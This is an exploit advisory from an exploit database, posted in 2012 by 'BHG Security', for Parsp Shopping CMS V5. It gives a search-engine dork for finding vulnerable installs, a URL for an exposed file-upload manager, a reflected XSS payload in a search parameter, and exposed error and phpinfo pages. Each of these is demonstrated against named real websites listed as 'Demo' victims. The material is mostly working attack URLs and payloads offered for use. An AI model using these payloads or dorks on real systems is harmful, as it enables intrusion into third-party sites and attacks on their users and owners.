Parsp Shopping CMS [V5] Multiple Vulnerability

2012-01-22T00:00:00
ID 1337DAY-ID-17418
Type zdt
Reporter BHG Security
Modified 2012-01-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability
# Date: 2012-01-22 [GMT +7]
# Author: BHG Security Center
# Software Link: http://www.parsp.com/
# Vendor Response(s): They didn't respond to the emails.
# Dork: intext:"powered by www.parsp.com V5"
# Version : [5]
# Tested on: ubuntu 11.04
# CVE : -
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - NoL1m1t   (nol1m1t [at] rocketmail [dot] com)
 
-----------------------------------------------------------------------------------------
Parsp Shopping CMS [V4] Multiple Vulnerability
-----------------------------------------------------------------------------------------
 
Author : BHG Security Center
Date : 2012-01-22
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
 
PoC/Exploit:
~~~~~~~~~~
  
------------- ( WYSIWYG Editor ) ~ 
 
~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  
  ~ Demo : http://p30shops.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  ~ Demo : http://yooyaz.com//wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  ~ Demo : http://parrotsilver.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  ~ Demo : http://darbdar.com/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
  
   Allowed formats for uploading ~ 
   
   $Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" );
   $Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" );
   $Config['AllowedExtensions']['Flash'] = array( "swf", "fla" );
   $Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" );
   
   Unauthorized extension
  
   $Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" );
   
------------- ( Cross Site Scripting ) ~ 
 
~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=
  
   Demo : http://damedar.com/index.php?advanced_search_in_category=%27%20onmouseover%3dprompt%28923419%29%20bad%3d%27&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to=
 
Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad='

-------------( Error message on page For Find Directory Address ) ~ 
 
 ~ [PoC]Http://[victim]/path/printable.php

  ~ Demo : http://www.eshopctcenter.com/printable.php
  ~ Demo : http://www.hepco121.com/printable.php
  ~ Demo : http://aen-co.com/printable.php
  
Note:User and account information on the site intended for attacks burteforce

-------------( PHPinfo page Information ) ~ 
  
 ~ [PoC]Http://[victim]/path/phpinfo.php
 
  ~ Demo : http://kbl.ir/phpinfo.php
  ~ Demo : http://www.mavaraelec.com/phpinfo.php
  
Note:Full information about the Php installed on the server
  

 Timeline:
~~~~~~~~~
- 21 - 01 - 2012 bug found.
- 21 - 01 - 2012 vendor contacted, but no response.
- 22 - 01 - 2012 Advisories release.
 
 Important Notes:
~~~~~~~~~
 
- Vendor did not respond to the email as well as the phone. As there
is not any contact form or email address in
 
- the website, we have used all the emails which had been found by
searching in Google such as support, info, and so on.
 
---------------------------------------------------------------------------
Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall
 
Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz
 
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ
-------------------------------- [ EOF ] ----------------------------------



#  0day.today [2018-03-13]  #